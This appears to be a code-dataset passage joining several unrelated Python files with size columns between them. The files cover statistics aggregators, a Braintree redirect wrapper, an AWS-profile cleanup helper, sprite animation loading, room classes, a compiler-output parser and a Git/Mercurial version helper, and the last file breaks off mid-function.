        if self.count < 1:
            raise NonPositivePopulationSize("StdDev")
        self.count -= 1
        self.sum -= value
        self.sqrsum -= value**2
    def getSqr(self):
        """Return the population variance E[x^2] - E[x]^2."""
        if self.count < 1:
            raise NonPositivePopulationSize("StdDev")
        mean_of_squares = self.sqrsum/self.count
        square_of_mean = (self.sum/self.count)**2
        # Guard against tiny negative variances caused by float rounding.
        # FIXME: find out what values this happened for and make a test...
        if mean_of_squares < square_of_mean:  # pragma: no cover
            assert square_of_mean - mean_of_squares < 1e-3
            return 0.0
        return mean_of_squares - square_of_mean
class Avg(object):
    """Incremental arithmetic mean supporting add() and remove()."""
    def __init__(self):
        self.count = 0
        self.sum = 0
    def add(self, value):
        """Include `value` in the population."""
        self.count += 1
        self.sum += value
    def remove(self, value):
        # Refuse to shrink the population below one element: the average of
        # zero elements is undefined.
        if self.count <= 1:
            raise NonPositivePopulationSize("Avg")
        self.count -= 1
        self.sum -= value
    def get(self):
        """Return the current mean; raises when the population is empty."""
        if self.count < 1:
            raise NonPositivePopulationSize("Avg")
        return self.sum/self.count
class Sum(object):
    """Running total; get() returns the current sum."""
    def __init__(self):
        self.count = 0
        self.sum = 0
    def add(self, value):
        """Add `value` to the running total."""
        self.count += 1
        self.sum += value
    def remove(self, value):
        """Subtract a previously added `value`."""
        if self.count <= 0:
            raise NegativePopulationSize("Sum")
        self.count -= 1
        self.sum -= value
    def get(self):
        """Return the current total (valid even for an empty population)."""
        return self.sum
class Count(object):
    """Population counter: add() calls minus remove() calls."""
    def __init__(self):
        self.count = 0
    def add(self, value):
        """Count one element; `value` itself is ignored."""
        self.count += 1
    def remove(self, value):
        # Fast failure
        if self.count <= 0:
            # Bug fix: the error previously reported the typename "Sum".
            raise NegativePopulationSize("Count")
        self.count -= 1
    def get(self):
        """Return the current element count."""
        return self.count
class Stat(object):
    """Feed one named field of incoming dicts into an aggregator.

    `source` is the dict key to extract; `cls` is an aggregator class such
    as Avg, Sum, Count or StdDev. Records lacking the key are ignored.
    """
    def __init__(self, source, cls):
        self.source = source
        self.value = cls()
    def add(self, value):
        if self.source not in value:
            return
        self.value.add(value[self.source])
    def remove(self, value):
        if self.source not in value:
            return
        self.value.remove(value[self.source])
    def get(self):
        """Return the aggregated value."""
        return self.value.get()
class StatSum(object):
    """Broadcast add/remove to several Stat objects and combine their values.

    get() folds the underlying aggregates together with `+` (see
    AbstractStdDev.__add__) and returns the combined result.
    """
    def __init__(self, *stats):
        self.stats = stats
    def add(self, value):
        for stat in self.stats:
            stat.add(value)
    def remove(self, value):
        for stat in self.stats:
            stat.remove(value)
    def get(self):
        combined = self.stats[0].value
        for other in self.stats[1:]:
            combined = combined + other.value
        return combined.get()
class Stats(object):
    """Apply several named Stat/StatSum aggregators to the same records.

    Example::

        stat = Stats({
            "latitude": Stat("latitude", Avg),
            "longitude": Stat("longitude", Avg),
            "sigma": StatSum(Stat("latitude", StdDev),
                             Stat("longitude", StdDev))})
        stat.add({'latitude': 4.3, 'longitude': 3.2})
        print(stat.get()['sigma'])
    """
    def __init__(self, fieldmap):
        # fieldmap: result-name -> aggregator (Stat or StatSum).
        self.fieldmap = fieldmap
    def add(self, value):
        """Feed one record dict to every aggregator."""
        for aggregator in six.itervalues(self.fieldmap):
            aggregator.add(value)
    def remove(self, value):
        """Withdraw one record dict from every aggregator."""
        for aggregator in six.itervalues(self.fieldmap):
            aggregator.remove(value)
    def get(self):
        """Return {name: aggregated value} for every configured field."""
        return {
            name: aggregator.get()
            for (name, aggregator)
            in six.iteritems(self.fieldmap)}
| 4,589 | 1,449 |
import braintree
from braintree.configuration import Configuration
class TransparentRedirect:
    """
    A class used for Transparent Redirect operations.

    All methods delegate to the gateway configured on
    braintree.Configuration.
    """
    class Kind(object):
        # The operations a transparent redirect request can perform.
        CreateCustomer = "create_customer"
        UpdateCustomer = "update_customer"
        CreatePaymentMethod = "create_payment_method"
        UpdatePaymentMethod = "update_payment_method"
        CreateTransaction = "create_transaction"
    @staticmethod
    def confirm(query_string):
        """
        Confirms a transparent redirect request. It expects the query string from the
        redirect request. The query string should _not_ include the leading "?" character. ::

            result = braintree.TransparentRedirect.confirm("foo=bar&id=12345")
        """
        return Configuration.gateway().transparent_redirect.confirm(query_string)
    @staticmethod
    def tr_data(data, redirect_url):
        """Build the signed tr_data string for a form that redirects to `redirect_url`."""
        return Configuration.gateway().transparent_redirect.tr_data(data, redirect_url)
    @staticmethod
    def url():
        """
        Returns the url for POSTing Transparent Redirect HTML forms
        """
        return Configuration.gateway().transparent_redirect.url()
| 1,186 | 299 |
# coding=utf-8
from .misc import AbstractAttribTracer
from .transformer import AbstractDataTransformer
from .translator import AbstractTranslator
from .translator_hub import AbstractTranslatorsHub
| 197 | 56 |
import argparse
import psutil
from ..awsumepy.lib.aws_files import delete_section, get_aws_files, read_aws_file
from ..awsumepy.lib.logger import logger
def kill_autoawsume():
    """Terminate every running process whose command line mentions autoawsume."""
    logger.debug('Killing autoawsume')
    for proc in psutil.process_iter():
        try:
            if any('autoawsume' in part for part in proc.cmdline()):
                proc.kill()
        except Exception:
            # Best effort: processes can vanish or deny access mid-scan.
            pass
def kill(arguments: argparse.Namespace):
    """Stop autoawsume auto-refreshing.

    With --profile-name: stop refreshing just that profile and delete its
    cached credential sections; the autoawsume watcher process is only
    killed when no auto-refreshed profiles remain. Without a profile name:
    kill the watcher and scrub every autoawsume profile from the
    credentials file.
    """
    _, credentials_file = get_aws_files(None, None)
    if arguments.profile_name:
        # Typo fix: was "Stoping".
        logger.debug('Stopping auto-refresh of profile {}'.format(arguments.profile_name))
        profiles = read_aws_file(credentials_file)
        autoawsume_name = 'autoawsume-{}'.format(arguments.profile_name)
        if autoawsume_name in profiles:
            delete_section(autoawsume_name, credentials_file)
            profiles.pop(autoawsume_name)
        if arguments.profile_name in profiles and profiles[arguments.profile_name].get('autoawsume'):
            delete_section(arguments.profile_name, credentials_file)
            profiles.pop(arguments.profile_name)
        # If any auto-refreshed profile is still active, leave the watcher alive.
        autoawsume_profiles = [{k: v} for k, v in profiles.items() if v.get('autoawsume')]
        if autoawsume_profiles:
            print('Stop {}'.format(arguments.profile_name))
            return
        else:
            logger.debug('There are no more autoawsume profiles, stopping autoawsume')
            print('Kill')
            kill_autoawsume()
    else:
        logger.debug('Stopping all auto refreshing and removing autoawsume profiles')
        kill_autoawsume()
        profiles = read_aws_file(credentials_file)
        for profile in profiles:
            if 'autoawsume-' in profile or profiles[profile].get('autoawsume'):
                delete_section(profile, credentials_file)
        print('Kill')
| 1,902 | 522 |
import json
import os
import gc
from .app import get_screen
from .utils import Rect
from .bitmatrix import BitMatrix
class SpritesManager:
    """Hands out hardware sprite slots (up to `limit`), reusing freed ids first."""
    def __init__(self):
        self.free_indices = []  # ids released by callers, recycled first
        self.last_used = -1     # highest id ever handed out
        self.limit = 160
    def clear(self):
        """Forget every allocation."""
        self.free_indices = []
        self.last_used = -1
    def allocate(self, data):
        """Upload `data` into a free sprite slot and return its id, or -1 when full."""
        if self.free_indices:
            sprite_id = self.free_indices.pop()
        else:
            sprite_id = self.last_used + 1
            if sprite_id >= self.limit:
                return -1
            self.last_used = sprite_id
        get_screen().set_sprite(sprite_id, data)
        return sprite_id
sprites_manager = SpritesManager()
class SpriteSheet:
    """A sprite sheet loaded from a raw binary file.

    File layout: a 4-byte header (width then height, little-endian uint16)
    followed by pixel data at 2 bytes per pixel. 32x32 sub-rectangles are
    uploaded to the screen as sprites on demand and cached per Rect.
    """
    def __init__(self, filename=''):
        self.width = 0
        self.height = 0
        self.data = None    # raw pixel bytes; released by clean()
        self.sprites = {}   # Rect -> (sprite_id, BitMatrix transparency mask)
        self.rect = None    # full-sheet bounds
        if filename:
            self.load(filename)
    def clean(self):
        """Free the raw pixel data (already-uploaded sprites stay cached)."""
        self.data = None
        gc.collect()
    def load(self, filename):
        """Read the sheet from disk; True on success, False when unreadable."""
        try:
            gc.collect()
            print("Loading "+filename)
            # NOTE: gc.mem_free() exists on MicroPython only.
            print("Free Mem: "+str(gc.mem_free()))
            with open(filename, 'rb') as f:
                data = f.read(4)
                # Header: width and height as little-endian 16-bit values.
                self.width = (int(data[1]) << 8) | int(data[0])
                self.height = (int(data[3]) << 8) | int(data[2])
                data = None
                self.data = f.read()
            self.rect = Rect(0, 0, self.width, self.height)
            return True
        except OSError:
            return False
    def get_sprite_data(self, rect):
        """Return (sprite_id, mask) for the 32x32 sub-rectangle `rect`.

        Results are cached per rect. Invalid, out-of-bounds or non-32x32
        rects yield (-1, None).
        """
        if rect in self.sprites:
            return self.sprites.get(rect)
        if rect.valid() and self.rect.contains(rect) and rect.width() == 32 and rect.height() == 32:
            data = bytearray(32 * 32 * 2)  # 2 bytes per pixel
            src = (rect.tl.y * self.width + rect.tl.x) * 2
            dst = 0
            mask = BitMatrix(32, 32)
            mask.setall(True)
            for i in range(32):
                # Copy one 64-byte row, then clear mask bits for pixels of
                # value 0x0020 -- presumably the transparent key colour.
                data[dst:(dst + 64)] = self.data[src:(src + 64)]
                for j in range(32):
                    if data[dst + j * 2] == 0x20 and data[dst + j * 2 + 1] == 0:
                        mask.set(j, i, False)
                dst = dst + 64
                src = src + self.width * 2
            sprite_data = sprites_manager.allocate(bytes(data)), mask
            self.sprites[rect] = sprite_data
        else:
            sprite_data = -1, None
        return sprite_data
sprite_sheets = {}  # filename -> SpriteSheet cache
def get_sprite_sheet(filename):
    """Return the cached SpriteSheet for `filename`, loading it at most once."""
    sheet = sprite_sheets.get(filename)
    if sheet is None:
        sheet = SpriteSheet(filename)
        sprite_sheets[filename] = sheet
    return sheet
# EXPORT
class Sprite(object):
    """One 32x32 sprite: hardware slot id, transparency mask, frame duration
    and draw flags."""
    def __init__(self, sprite_id, mask, duration=0.0, flags=0):
        self.sprite_id = sprite_id
        self.mask = mask
        self.duration = duration
        self.flags = flags
    def draw(self, position):
        """Blit this sprite at `position` using its draw flags."""
        screen = get_screen()
        screen.draw_sprite(position.x, position.y, self.sprite_id, self.flags)
    @staticmethod
    def get_rect():
        """All sprites are a fixed 32x32."""
        return Rect(0, 0, 32, 32)
    @staticmethod
    def deserialize(filename, obj):
        """Build a Sprite from a JSON frame dict ('Rect', 'Duration', optional 'Flags')."""
        coords = [int(part) for part in obj['Rect'].strip().split(',')]
        duration = obj['Duration']
        flags = obj.get('Flags', 0)
        sheet = get_sprite_sheet(filename)
        sprite_id, mask = sheet.get_sprite_data(
            Rect(coords[0], coords[1], coords[2], coords[3]))
        return Sprite(sprite_id, mask, duration, flags)
# EXPORT
class AnimationSequence(object):
    """An ordered list of Sprite frames with a reference velocity."""
    def __init__(self, name, base_vel=1.0):
        self.name = name
        self.base_vel = base_vel  # velocity at which the animation plays 1:1
        self.sprites = []
    def add_sprite(self, sprite):
        """Append one frame."""
        self.sprites.append(sprite)
    def deserialize(self, filename, seq):
        """Rebuild the frame list from a JSON sequence dict ('Frames')."""
        self.sprites = [Sprite.deserialize(filename, frame)
                        for frame in seq['Frames']]
    def __getitem__(self, index):
        return self.sprites[index]
    def __len__(self):
        return len(self.sprites)
# EXPORT
class StaticSprite:
    """A drawable wrapping a single non-animated sprite (possibly unset)."""
    def __init__(self, sprite=None):
        self.sprite = sprite
    def get_current_sprite(self):
        """Return the wrapped sprite (or None)."""
        return self.sprite
    def get_rect(self):
        """Bounding rect of the sprite; a default 32x32 when unset."""
        if not self.sprite:
            return Rect(0, 0, 32, 32)
        return self.sprite.get_rect()
    def draw(self, pos):
        """Draw the sprite at `pos`; no-op when unset."""
        if not self.sprite:
            return
        self.sprite.draw(pos)
# EXPORT
class AnimatedSprite(object):
    """A drawable with several named AnimationSequences.

    Frame advance speed scales with the entity's velocity relative to the
    active sequence's base velocity; the 'AnimDir' flag selects which axis
    of the velocity drives the animation ('X', 'Y', or '' for magnitude).
    """
    def __init__(self):
        self.sheet = None
        self.sequences = {}         # name -> AnimationSequence
        self.flags = {}
        self.active_sequence = None
        self.cur_sprite = 0         # index of the current frame
        self.dt = 0.0               # time accumulated inside the current frame
        self.anim_dir = ''          # '', 'X' or 'Y'
    def add_flag(self, name, value):
        """Record a flag; 'AnimDir' also sets the animation axis."""
        if name == 'AnimDir':
            self.anim_dir = value
        self.flags[name] = value
    def get_longest_sequence(self):
        """Return the sequence with the most frames, or None if there are none."""
        mx = 0
        res = None
        for name in self.sequences:
            seq = self.sequences.get(name)
            if len(seq) > mx:
                mx = len(seq)
                res = seq
        return res
    def get_sequence_by_name(self, name):
        return self.sequences.get(name)
    def get_sequence_by_index(self, index):
        """Return the index-th sequence in dict order, or None if out of range."""
        for name in self.sequences.keys():
            if index == 0:
                return self.sequences.get(name)
            index -= 1
        return None
    def get_active_sequence_name(self):
        if not self.active_sequence:
            return ''
        return self.active_sequence.name
    def set_active_sequence(self, name):
        """Switch to sequence `name` (if it exists), restarting the animation."""
        if name != self.get_active_sequence_name() and name in self.sequences:
            self.active_sequence = self.sequences.get(name)
            self.dt = 0.0
            self.cur_sprite = 0
    def add_sequence(self, seq):
        """Register `seq`; the first registered sequence becomes active."""
        self.sequences[seq.name] = seq
        if not self.active_sequence:
            self.active_sequence = seq
    def calculate_axial_velocity(self, velocity):
        """Velocity magnitude along the configured animation axis."""
        if self.anim_dir == 'X':
            return abs(velocity.x)
        if self.anim_dir == 'Y':
            return abs(velocity.y)
        return velocity.length()
    def advance(self, dt, velocity):
        """Advance the animation by `dt`, scaled by the entity's velocity."""
        axial_velocity = self.calculate_axial_velocity(velocity)
        if self.active_sequence and len(self.active_sequence) > 0:
            mult = 1.0
            if self.active_sequence.base_vel > 0 and axial_velocity > 0.001:
                mult = axial_velocity / self.active_sequence.base_vel
            self.dt = self.dt + dt * mult
            if self.cur_sprite >= len(self.active_sequence):
                self.cur_sprite = 0
            # Consume whole frame durations, wrapping around the sequence.
            spr = self.active_sequence[self.cur_sprite]
            while self.dt >= spr.duration:
                self.dt = self.dt - spr.duration
                self.cur_sprite += 1
                if self.cur_sprite >= len(self.active_sequence):
                    self.cur_sprite = 0
        return True
    def get_current_sprite(self):
        if self.active_sequence:
            return self.active_sequence[self.cur_sprite]
        return None
    def get_current_height(self):
        """Height in pixels of the current frame (0 when there is none)."""
        spr = self.get_current_sprite()
        if spr:
            # Bug fix: Sprite has no height() method; use its rect instead.
            return spr.get_rect().height()
        return 0
    def draw(self, position):
        spr = self.get_current_sprite()
        if spr:
            spr.draw(position)
    def get_rect(self):
        spr = self.get_current_sprite()
        if spr:
            return spr.get_rect()
        return Rect(0, 0, 1, 1)
    def deserialize(self, obj, overrides):
        """Build sequences from a JSON dict; `overrides` may replace 'BaseVelocity'."""
        filename = obj['Image']
        flags = obj['Flags']
        for key in flags:
            self.add_flag(key, flags[key])
        for seq in obj['Sequences']:
            base_vel = seq['BaseVelocity']
            if 'BaseVelocity' in overrides:
                base_vel = overrides.get('BaseVelocity')
            s = AnimationSequence(seq['Name'], base_vel)
            s.deserialize(filename, seq)
            self.add_sequence(s)
        # Raw sheet pixels are no longer needed once sprites are uploaded.
        for name in sprite_sheets:
            sprite_sheets.get(name).clean()
    def load(self, filename, overrides={}):
        # NOTE: the mutable default is only read, never mutated.
        return self.deserialize(json.load(open(filename, "r")), overrides)
# EXPORT
def load_json_file(filename):
    """Load an AnimatedSprite description from a JSON file.

    Bug fix: AnimatedSprite.deserialize() requires an `overrides` mapping;
    the previous call omitted it and always raised TypeError. The file is
    now also closed deterministically.
    """
    with open(filename, "r") as f:
        obj = json.load(f)
    a = AnimatedSprite()
    a.deserialize(obj, {})
    return a
# EXPORT
def load_json_str(s):
    """Parse an AnimatedSprite description from a JSON string.

    Bug fix: AnimatedSprite.deserialize() requires an `overrides` mapping;
    the previous call omitted it and always raised TypeError.
    """
    obj = json.loads(s)
    a = AnimatedSprite()
    a.deserialize(obj, {})
    return a
# EXPORT
def load_file(filename):
    """Alias for load_json_file()."""
    return load_json_file(filename)
# EXPORT
def load_str(s):
    """Alias for load_json_str()."""
    return load_json_str(s)
if __name__ == '__main__':
    print(os.getcwd())
| 8,787 | 2,819 |
from abc import ABCMeta, abstractmethod
class Room(object):
    """A room holding up to `max_capacity` occupants."""
    __metaclass__ = ABCMeta  # NOTE: Python-2 style; has no effect on Python 3
    room_count = 0           # class-wide counter used to assign unique ids
    def __init__(self, name=None, max_capacity=None):
        self.room_id = Room.room_count
        # Bug fix: `self.room_count += 1` only created an instance attribute
        # shadowing the class counter, so every room got id 0.
        Room.room_count += 1
        self.name = name
        self.max_capacity = max_capacity
        self.occupants = []
    def add_occupant(self, occupant):
        """Add `occupant`; returns False when the room is already full."""
        if self.is_full():
            return False  # bug fix: was the undefined name `false`
        self.occupants.append(occupant)
        return True
    def remove_occupant(self, occupant):
        """Remove `occupant`; returns False when they are not in the room."""
        if self.is_an_occupant(occupant):
            self.occupants.remove(occupant)
            return True
        return False  # bug fix: was the undefined name `false`
    def is_an_occupant(self, occupant):
        return occupant in self.occupants
    def is_full(self):
        return len(self.occupants) >= self.max_capacity
    def __repr__(self):
        return '%s(name=%s, purpose=%s, max_capacity=%s)' % (
            self.__class__.__name__,
            self.name,
            # `purpose` is only set by subclasses; default keeps repr safe
            # on a bare Room.
            getattr(self, 'purpose', None),
            self.max_capacity
        )
    def __str__(self):
        return self.name  # bug fix: was `Self.name` (undefined name)
class OfficeSpace(Room):
    """A Room used as office space; default capacity is 6 occupants."""
    def __init__(self, name=None, max_capacity=6):
        Room.__init__(self, name=name, max_capacity=max_capacity)
        self.purpose = "OFFICE"
class LivingSpace(Room):
    """A Room used as living space; default capacity is 4 occupants."""
    def __init__(self, name=None, max_capacity=4):
        Room.__init__(self, name=name, max_capacity=max_capacity)
        self.purpose = "LIVINGSPACE"
| 1,562 | 491 |
# Copyright (C) 2014 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common.logger import Logger
from file_format.common import SplitStream
from file_format.c1visualizer.struct import C1visualizerFile, C1visualizerPass
import re
class C1ParserState:
    """Mutable parser state: the current section plus the last method seen."""
    # The four kinds of section a C1visualizer line can belong to.
    OutsideBlock, InsideCompilationBlock, StartingCfgBlock, InsideCfgBlock = range(4)
    def __init__(self):
        self.currentState = self.OutsideBlock
        self.lastMethodName = None
def __parseC1Line(line, lineNo, state, fileName):
    """ This function is invoked on each line of the output file and returns
  a triplet which instructs the parser how the line should be handled. If the
  line is to be included in the current group, it is returned in the first
  value. If the line starts a new output group, the name of the group is
  returned in the second value. The third value is only here to make the
  function prototype compatible with `SplitStream` and is always set to
  `None` here.
  """
    if state.currentState == C1ParserState.StartingCfgBlock:
        # Previous line started a new 'cfg' block which means that this one must
        # contain the name of the pass (this is enforced by C1visualizer).
        # Raw strings avoid invalid-escape warnings in the regex patterns.
        if re.match(r'name\s+"[^"]+"', line):
            # Extract the pass name, prepend it with the name of the method and
            # return as the beginning of a new group.
            state.currentState = C1ParserState.InsideCfgBlock
            return (None, state.lastMethodName + " " + line.split("\"")[1], None)
        else:
            Logger.fail("Expected output group name", fileName, lineNo)
    elif state.currentState == C1ParserState.InsideCfgBlock:
        if line == "end_cfg":
            state.currentState = C1ParserState.OutsideBlock
            return (None, None, None)
        else:
            return (line, None, None)
    elif state.currentState == C1ParserState.InsideCompilationBlock:
        # Search for the method's name. Format: method "<name>"
        if re.match(r'method\s+"[^"]*"', line):
            methodName = line.split("\"")[1].strip()
            if not methodName:
                Logger.fail("Empty method name in output", fileName, lineNo)
            state.lastMethodName = methodName
            # NOTE(review): this branch falls through and returns None rather
            # than a triplet; SplitStream appears to tolerate it -- confirm
            # before restructuring.
        elif line == "end_compilation":
            state.currentState = C1ParserState.OutsideBlock
            return (None, None, None)
    else:
        assert state.currentState == C1ParserState.OutsideBlock
        if line == "begin_cfg":
            # The line starts a new group but we'll wait until the next line from
            # which we can extract the name of the pass.
            if state.lastMethodName is None:
                Logger.fail("Expected method header", fileName, lineNo)
            state.currentState = C1ParserState.StartingCfgBlock
            return (None, None, None)
        elif line == "begin_compilation":
            state.currentState = C1ParserState.InsideCompilationBlock
            return (None, None, None)
        else:
            Logger.fail("C1visualizer line not inside a group", fileName, lineNo)
def ParseC1visualizerStream(fileName, stream):
    """Parse `stream` into a C1visualizerFile of named passes."""
    c1File = C1visualizerFile(fileName)
    state = C1ParserState()
    def processLine(line, lineNo):
        return __parseC1Line(line, lineNo, state, fileName)
    def lineOutsideChunk(line, lineNo):
        return Logger.fail("C1visualizer line not inside a group", fileName, lineNo)
    for passName, passLines, startLineNo, testArch in \
            SplitStream(stream, processLine, lineOutsideChunk):
        # Pass line numbers are reported 1-based.
        C1visualizerPass(c1File, passName, passLines, startLineNo + 1)
    return c1File
| 3,972 | 1,152 |
from __future__ import absolute_import
import logging
import os
import re
import subprocess
import six
LOGGER = logging.getLogger('natcap.versioner.versioning')
LOGGER.setLevel(logging.ERROR)
class VCSQuerier(object):
    """Base class for querying version information from a source checkout.

    Subclasses set `name`/`repo_data_location` and implement the
    tag_distance/build_id/latest_tag/branch/node properties.
    """
    name = 'VCS'
    is_archive = False
    # Path, relative to the repo root, that marks a checkout of this VCS
    # (e.g. '.git', '.hg').
    repo_data_location = ''
    def __init__(self, repo_path):
        # Resolve the repository root containing `repo_path`.
        repo_root = self._find_repo_root(repo_path)
        if not repo_root:
            raise ValueError('Not within a %s repository: %s' % (
                self.name, repo_path))
        self._repo_path = repo_root
    def _find_repo_root(self, dirpath):
        """Walk up the directory tree and locate the directory that contains
        the repo data."""
        abs_repo_path = os.path.abspath(dirpath)
        def _locate_data(path):
            # base case: we can't go up another directory and still haven't
            # found the repo data.
            if os.path.dirname(path) == path:
                return None
            if os.path.exists(os.path.join(path, self.repo_data_location)):
                return path
            return _locate_data(os.path.dirname(path))
        return _locate_data(abs_repo_path)
    def _run_command(self, cmd, cwd=None):
        """Run a subprocess.Popen command.

        All output to stdout, stdin and stderr will be treated as stdout,
        captured, and returned. Commands are executed as shell commands.

        Parameters:
            cmd (string) - a python string to be executed in the shell.
            cwd=None (string or None) - the string path to the directory on
                disk to use as the CWD. If None, the current CWD will be
                used.

        Returns:
            A python bytestring of the output of the given command."""
        p = subprocess.check_output(
            cmd, shell=True, stdin=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            cwd=cwd)
        return p.strip().decode('utf-8')  # output without leading/trailing newlines
    @property
    def tag_distance(self):
        # Number of commits since the most recent tag (int).
        raise NotImplementedError
    @property
    def build_id(self):
        # Human-readable build identifier, e.g. '<dist>:<tag> [<node>]'.
        raise NotImplementedError
    @property
    def latest_tag(self):
        # Most recent tag reachable from the current revision.
        raise NotImplementedError
    @property
    def branch(self):
        # Name of the currently checked-out branch.
        raise NotImplementedError
    @property
    def node(self):
        # Short identifier of the current revision.
        raise NotImplementedError
    @property
    def release_version(self):
        """This function gets the release version. Returns either the latest tag
        (if we're on a release tag) or None, if we're on a dev changeset."""
        if self.tag_distance == 0:
            return self.latest_tag
        return None
    @property
    def version(self):
        """This function gets the module's version string. This will be either the
        dev build ID (if we're on a dev build) or the current tag if we're on a
        known tag. Either way, the return type is a string."""
        release_version = self.release_version
        if release_version is None:
            return self.build_dev_id(self.build_id)
        return release_version
    def build_dev_id(self, build_id=None):
        """This function builds the dev version string. Returns a string."""
        if build_id is None:
            build_id = self.build_id
        return 'dev%s' % (build_id)
    def pep440(self, branch=True, method='post'):
        """Build a PEP 440 style version string.

        method='post': '<tag>.post<dist>+n<node>[-<branch>]'
        method='pre':  same shape, but the tag is incremented first.
        At an exact tag, just the tag is returned.
        """
        assert method in ['pre', 'post'], ('Versioning method %s '
                                           'not valid') % method
        # If we're at a tag, return the tag only.
        if self.tag_distance == 0:
            return self.latest_tag
        template_string = "%(latesttag)s.%(method)s%(tagdist)s+n%(node)s"
        if branch is True:
            template_string += "-%(branch)s"
        latest_tag = self.latest_tag
        if method == 'pre':
            latest_tag = _increment_tag(latest_tag)
        data = {
            'tagdist': self.tag_distance,
            'latesttag': latest_tag,
            'node': self.node,
            'branch': self.branch,
            'method': method,
        }
        version_string = template_string % data
        return version_string
class HgArchive(VCSQuerier):
    """Version info for an unpacked `hg archive` (reads .hg_archival.txt)."""
    name = 'Mercurial Archive'
    shortnode_len = 12
    is_archive = True
    repo_data_location = '.hg_archival.txt'
    @property
    def build_id(self):
        """Build identifier: '<dist>:<tag> [<shortnode>]'."""
        attrs = _get_archive_attrs(self._repo_path)
        short_node = attrs['node'][:self.shortnode_len]
        return '{latesttagdistance}:{latesttag} [{node}]'.format(
            latesttagdistance=attrs['latesttagdistance'],
            latesttag=attrs['latesttag'],
            node=short_node,
        )
    @property
    def tag_distance(self):
        # Exactly at a tag the archive file omits 'latesttagdistance'.
        attrs = _get_archive_attrs(self._repo_path)
        if 'latesttagdistance' in attrs:
            return attrs['latesttagdistance']
        return 0
    @property
    def latest_tag(self):
        # Exactly at a tag the archive file records 'tag', not 'latesttag'.
        attrs = _get_archive_attrs(self._repo_path)
        if 'latesttag' in attrs:
            return six.text_type(attrs['latesttag'])
        return six.text_type(attrs['tag'])
    @property
    def branch(self):
        """Branch recorded in the archive metadata."""
        return _get_archive_attrs(self._repo_path)['branch']
    @property
    def node(self):
        """Shortened changeset hash recorded in the archive metadata."""
        return _get_archive_attrs(self._repo_path)['node'][:self.shortnode_len]
class HgRepo(VCSQuerier):
    """Version info queried from a live Mercurial checkout via `hg log`."""
    name = 'Mercurial'
    is_archive = False
    repo_data_location = '.hg'
    def _log_template(self, template_string):
        """Run `hg log -r .` with the given template and return its output."""
        base_call = 'hg log -r . --config ui.report_untrusted=False'
        command = '%s --template="%s"' % (base_call, template_string)
        return self._run_command(command, cwd=self._repo_path)
    @property
    def build_id(self):
        """Build identifier: '<dist>:<tag> [<shortnode>]'."""
        return self._log_template('{latesttagdistance}:{latesttag} '
                                  '[{node|short}]')
    @property
    def tag_distance(self):
        """Number of commits since the latest tag, as an int."""
        return int(self._log_template('{latesttagdistance}'))
    @property
    def latest_tag(self):
        """Most recent tag reachable from the working revision."""
        return self._log_template('{latesttag}')
    @property
    def branch(self):
        """Name of the currently checked-out branch."""
        return self._log_template('{branch}')
    @property
    def node(self):
        """Short changeset hash of the working revision."""
        return self._log_template('{node|short}')
class GitRepo(VCSQuerier):
    """Version info queried from a live git checkout."""
    name = 'Git'
    repo_data_location = '.git'
    def __init__(self, repo_path):
        VCSQuerier.__init__(self, repo_path)
        # Results cached by the last _describe_current_rev() call.
        self._tag_distance = None
        self._latest_tag = None
        self._commit_hash = None
    def _run_command(self, cmd):
        # Always execute inside the repository root.
        return VCSQuerier._run_command(self, cmd, self._repo_path)
    @property
    def branch(self):
        """Name of the currently checked-out branch."""
        branch_cmd = 'git branch'
        current_branches = self._run_command(branch_cmd)
        for line in current_branches.split('\n'):
            if line.startswith('* '):
                return line.replace('* ', '').strip()
        raise IOError('Could not detect current branch')
    def _describe_current_rev(self):
        """Refresh the cached tag distance, latest tag and commit hash."""
        self._tag_distance = None
        self._latest_tag = None
        self._commit_hash = None
        current_branch = self.branch
        try:
            data = self._run_command('git describe --tags')
        except subprocess.CalledProcessError:
            # No tags in the repository: fall back to counting every commit.
            self._latest_tag = 'null'
            num_commits_cmd = 'git rev-list %s --count' % current_branch
            # Bug fix: cast to int for consistency with the other branches
            # (tag_distance is compared against integers elsewhere).
            self._tag_distance = int(self._run_command(num_commits_cmd))
            commit_hash_cmd = 'git log -1 --pretty="format:%h"'
            self._commit_hash = self._run_command(commit_hash_cmd)
        else:
            if '-' not in data:
                # We are exactly at a tag.
                self._latest_tag = str(data)
                self._tag_distance = 0
                commit_hash_cmd = 'git log -1 --pretty="format:%h"'
                self._commit_hash = self._run_command(commit_hash_cmd)
            else:
                # Not at a tag; `git describe` prints <tag>-<dist>-g<hash>.
                # Bug fix: rsplit so tag names containing dashes still parse.
                tagname, tag_dist, _commit_hash = data.rsplit('-', 2)
                self._tag_distance = int(tag_dist)
                self._latest_tag = tagname
                self._commit_hash = self.node
    @property
    def build_id(self):
        """Build identifier: '<dist>:<tag> [<hash>]'."""
        self._describe_current_rev()
        return "%s:%s [%s]" % (self._tag_distance, self._latest_tag,
                               self._commit_hash)
    @property
    def tag_distance(self):
        """Number of commits since the latest tag, as an int."""
        self._describe_current_rev()
        return self._tag_distance
    @property
    def latest_tag(self):
        """Most recent tag, or 'null' when the repo has no tags."""
        self._describe_current_rev()
        return self._latest_tag
    @property
    def node(self):
        """First 8 characters of the full HEAD commit hash."""
        return self._run_command('git rev-parse HEAD').strip()[:8]
    @property
    def is_archive(self):
        # Archives are a mercurial feature.
        return False
def _increment_tag(version_string):
assert len(re.findall('([0-9].?)+', version_string)) >= 1, (
'Version string must be a release')
# increment the minor version number and not the update num.
tag = [int(s) for s in version_string.split('.')]
tag[-1] += 1
return '.'.join([str(i) for i in tag])
def _get_archive_attrs(archive_path):
"""
If we're in an hg archive, there will be a file '.hg_archival.txt' in the
repo root. If this is the case, we can fetch relevant build information
from this file that we might normally be able to get directly from hg.
Parameters:
attr (string): The archive attr to fetch. One of
"repo"|"node"|"branch"|"latesttag"|"latesttagdistance"|"changessincelatesttag"
archive_path (string): The path to the mercurial archive.
The .hg_archival.txt file must exist right inside this directory.
Returns:
A dict of the attributes within the .hg_archival file.
Raises:
IOError when the .hg_archival.txt file cannot be found.
KeyError when `attr` is not in .hg_archival.txt
"""
archival_filepath = os.path.join(archive_path, '.hg_archival.txt')
attributes = {}
with open(archival_filepath) as archival_file:
